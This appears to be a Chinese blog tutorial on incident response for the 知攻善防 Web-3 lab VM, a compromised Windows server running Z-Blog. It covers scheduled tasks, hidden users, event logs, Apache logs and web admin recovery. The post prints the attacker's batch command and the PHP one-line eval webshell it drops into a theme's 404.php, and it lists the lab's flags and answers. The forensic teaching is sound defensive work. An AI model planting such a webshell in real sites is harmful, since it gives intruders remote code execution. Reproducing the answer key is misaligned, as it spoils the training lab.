news 2026/5/12 17:05:31

应急响应——知攻善防Web-3靶机详细教程

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
应急响应——知攻善防Web-3靶机详细教程

今天继续给大家带来知攻善防Web-3靶机详细教程,其实基础的Windows应急响应的思路都是大差不差的;常见的几个点就是"计划任务“”开机启动项“”后台进程“”隐藏用户“等;

  • 本靶机与Web-1的步骤都是差不多的;目的就是为了巩固相应的知识;

文章目录

    • 靶机环境
      • 前景需要:
    • 应急溯源过程
      • (1)任务计划
      • (2)隐藏用户排查
      • (3)日志文件
      • (4)Web应用程序日志
      • (5)进程排查
    • Web服务排查
      • 通过 Z-Blog 官方提供的重置工具
      • 解题
    • 总结

靶机环境

今天继续给大家带来知攻善防Web-3靶机详细教程,其实基础的Windows应急响应的思路都是大差不差的;常见的几个点就是"计划任务“”开机启动项“”后台进程“”隐藏用户“等;

前景需要:

小苕在省护值守中,在灵机一动情况下把设备停掉了,甲方问:为什么要停设备?小苕说:我第六感告诉我,这机器可能被黑了。

这是他的服务器,请你找出以下内容作为通关条件:

  1. 攻击者的两个IP地址
  2. 隐藏用户名称
  3. 黑客遗留下的flag【3个】

本虚拟机的考点不在隐藏用户以及ip地址,仔细找找吧。

  • 关于靶机启动
    解压后双击.ovf文件,使用Vmware打开,直接导入即可。

  • 相关账户密码(Windows)
    administrator/xj@123456

话不多说,直接开始本次的主机排查,具体步骤可以先看看:知攻善防蓝队靶机Web-1溯源过程


应急溯源过程

首先,我们进入主机,发现是台Windows Server 2012服务器

这里我们还是先查找常见的几个排查点:

  • 计划任务程序
  • 开机启动项
  • 后台进程
  • 隐藏用户
  • 后台Webshell文件
  • 系统日志

(1)任务计划

单击【开始】>【设置】>【控制面板】>【任务计划】,查看计划任务属性

首先打开这个,我们就遇到了第一个flag(运气比较好);并且我们得知了攻击者创建到隐藏用户为hack6618$

所以第一个flag为:flag{zgsfsys@sec}

那么接下来,我们要做的就是查看这个定时任务执行的后台文件是什么,以及路径:

可以看到,攻击者将文件处理为.bat的批处理文件,方便执行;
具体文件路径为:C:\Users\hack6618$\Downloads\system.bat

echo^<?php eval($_POST["pass"]);?^>>D:\phpstudy_pro\WWW\zb_users\theme\aymFreeFive\template\404.phpechoflag{888666abc}

我们来到具体目录下,发现文件主要目的就是在Web服务创建一个404.php文件(作用:创建一句话木马,是为了蚁剑等工具进行连接)

同时也得到了第二个flag:flag{888666abc}

(2)隐藏用户排查

接下来给大家几个常见隐藏用户排查的命令以及步骤:

  • 可疑账号
    ├── net user
    ├── net user 用户名
    └──lusrmgr.msc本地用户和组

当然还有一些简单的命令:

# 列出所有本地用户(基础排查)net user ——隐藏用户排查不出来# 获取用户详细信息(含状态、描述、SID)wmic useraccount get Name,Status,Description,Disabled,SID

(最保险的方法是直接去注册表进行查看:

  • 按 Win+R 输 “【regedit】”,导航至 【HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names】,右侧列表即含所有用户(含隐藏)。)

(3)日志文件

在Windows中,在进行溯源的时候,我们通常是查看“安全”“系统”“应用程序”这三个日志:

具体步骤:
Win+R 打开运行,输入 “【eventvwr.msc】”,回车运行,打开"事件查看器":

搜索登陆失败的4645事件ID,我们可以大概判断攻击者的攻击时间:2024/3/11 20. ~ 22.左右

随后我们搜索4720创建用户的事件ID,发现创建了hack6618$隐藏用户:

(4)Web应用程序日志

随后发现在服务器上还安装了phpstudy,并且有Apache和MySQL等服务;那接下来的步骤就很熟悉了,直接分别查看他们的日志:

(只在Apache上发现日志:)

打开后,经过排查,发现192.168.75.129这个可疑IP在攻击前存在利用cmd.jsp文件进行爆破的行为:

如果我们想查看日志的具体内容,可以用Linux来进行排查:Apache和Linux日志分析

使用命令进行排查:

# 统计IP地址awk'{print$1}'access.log|uniq-c|sort-n# 不够美观—— uniq -c 只合并连续的相同行awk'{print$1}'access.log|sort|uniq-c|sort-nr


发现两个可疑IP地址;

想要详细查看具体某一个IP地址的信息:

# 查看具体IP的详细信息cataccess.log|grep192.168.75.130cataccess.log|grep192.168.75.129


可以看到192.168.75.130这个IP,一直在SYSTEM权限里尝试CSRF漏洞越权

  • CSRF 漏洞是 “跨站请求伪造”,指攻击者利用用户已登录的合法身份,诱导用户在不知情时发送恶意请求,执行非用户意愿的操作(如改密、操作数据)。

并且在/zb_users/theme/aymFreeFive/template/上传了一个404.php脚本文件:

具体内容:

<?php eval($_POST["pass"]);?>

  • 而这个文件就是我们在任务计划进行排查的时候system.bat文件进行的操作;

所以可疑IP:192.168.75.129和 192.168.75.130

(5)进程排查

系统进程以及服务的排查就简单多了,有以下方法:

  • 任务管理器
  • 命令netstat -ano

我们打开cmd然后输入命令,来查找存在哪些可疑进程:

无任何可疑信息;

Web服务排查

我们打开3306和Apache服务,进入到网站里:

具体页面如下:



(当前权限为游客)

还是老样子,熟悉系统的同时对Web目录进行枚举:

得到结果如上,随后我们分别进行访问:

没有任何信息,只能去网上搜索漏洞Zblog


不知道用户名密码?网上搜索一些常见的弱口令进行爆破:

失败了,只能上点手段了;

通过 Z-Blog 官方提供的重置工具

前提条件:你有FTP访问权限。

使用:通过FTP上传到Z-BlogPHP的根目录,在浏览器中打开nologin.php,使用过后此文件会自动删除。
下载地址:https://update.zblogcn.com/tools/nologin.zip

操作步骤:

  • 访问 Z-Blog 官方论坛。
  • 找到并点击“找回密码”或类似选项。
  • 下载 nologin.zip 文件。
  • 解压 nologin.zip 文件,取出 nologin.php 文件。
  • 使用FTP将 nologin.php 文件上传到你的Z-Blog PHP网站根目录。
  • 在浏览器中访问 http://你的域名/nologin.php。
  • 进入 nologin.php 页面后,点击“登录”按钮,即可进入后台。
  • 进入后台后,点击左侧导航栏的“用户管理”选项。
  • 选择管理员账户,然后修改密码。

随后访问:http://192.168.44.169/nologin.php

得到页面,同时还发现了攻击者保存的hacker账号

重置密码后,我们登录到admin用户和Hacker用户,查看攻击者存放了哪些后台文件

随后在Hacker后台找到了flag:

flag{H@Ck@sec}

解题

至此,我们找到了所有的flag和答案,点击服务器桌面的解题.exe,即可完成靶机挑战:

输入答案:

成功解决靶机

C:\Users\Administrator\Desktop>题解.exe 欢迎使用 知攻善防实验室 题解系统 确保你已获得以下信息: 攻击者的两个IP地址 攻击者隐藏用户名称 三个攻击者留下的flag 你准备好了吗?(y/n): y 请输入攻击者第一个ip地址:192.168.75.130 IP1地址正确 请输入攻击者第二个ip地址:192.168.75.129 IP2地址正确 请输入攻击者隐藏用户名:hack6618$ 用户名正确 请输入第一个flag:flag{zgsfsys@sec}flag1正确 请输入第二个flag:flag{888666abc}flag2正确 请输入第三个flag:flag{H@Ck@sec}flag3正确 恭喜你,你成功解出了该靶机 恭喜你,你成功解出了该靶机 恭喜你,你成功解出了该靶机 恭喜你,你成功解出了该靶机 恭喜你,你成功解出了该靶机 恭喜你,你成功解出了该靶机 恭喜你,你成功解出了该靶机 恭喜你,你成功解出了该靶机 C:\Users\Administrator\Desktop>

总结

没什么好说的,多动手,自己上手永远比眼睛看学的更多;

期待下次再见;

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/10 5:53:39

爽爆了,200套简历模板免费下载

前言&#xff1a;简历模板200套免费送&#xff0c;免费简历讨论阅读文本大概需要 2 分钟。很多时候本想有很多机会与更多的同学互助&#xff0c;往往交集不得&#xff0c;简历也算是与大家建立一个连接的方式&#xff0c;200套建立模板免费送&#xff0c;直接下载&#xff0c;随…

作者头像 李华
网站建设 2026/5/12 1:57:36

如何快速掌握React Native Elements:新手完全指南

如何快速掌握React Native Elements&#xff1a;新手完全指南 【免费下载链接】react-native-elements Cross-Platform React Native UI Toolkit 项目地址: https://gitcode.com/gh_mirrors/re/react-native-elements React Native UI组件库是现代移动应用开发的重要工具…

作者头像 李华
网站建设 2026/5/12 1:57:56

3步搭建LuCI离线开发环境:从零开始构建OpenWrt管理界面

你是否曾经在无网络环境下为OpenWrt设备开发Web管理界面而苦恼&#xff1f;LuCI作为OpenWrt的官方配置界面&#xff0c;提供了强大的扩展能力和灵活的架构设计。本文将为你揭示在断网情况下如何快速搭建完整的LuCI开发环境&#xff0c;让你能够高效进行应用开发、模块定制和界面…

作者头像 李华
网站建设 2026/5/9 23:32:42

医药医疗器械海外数字营销培训师培训讲师唐兴通讲出海营销Likedin营销Tiktok内容营销google营销大客户营销

《医疗器械海外数字营销实战》2天课程纲要课程背景在全球医疗器械市场竞争日益激烈的今天,传统的线下展会、医生拜访和经销商渠道已难以满足海外市场拓展的需求。特别是后疫情时代,海外客户的采购行为发生了根本性变化——超过70%的医疗器械采购决策者会在接触销售人员之前,通过…

作者头像 李华
网站建设 2026/5/11 18:04:35

FaceFusion镜像内置UI界面介绍:无需代码也能操作

FaceFusion镜像内置UI界面介绍&#xff1a;无需代码也能操作在数字内容创作门槛不断降低的今天&#xff0c;AI换脸技术早已不再是实验室里的神秘黑科技。从社交媒体上的趣味滤镜&#xff0c;到影视工业中的虚拟替身&#xff0c;人脸融合&#xff08;Face Fusion&#xff09;正以…

作者头像 李华
网站建设 2026/5/9 8:33:15

Kratos自适应降级:微服务架构的智能防护盾

Kratos自适应降级&#xff1a;微服务架构的智能防护盾 【免费下载链接】kratos Your ultimate Go microservices framework for the cloud-native era. 项目地址: https://gitcode.com/gh_mirrors/krato/kratos 在当今高并发的微服务架构中&#xff0c;服务雪崩、级联故…

作者头像 李华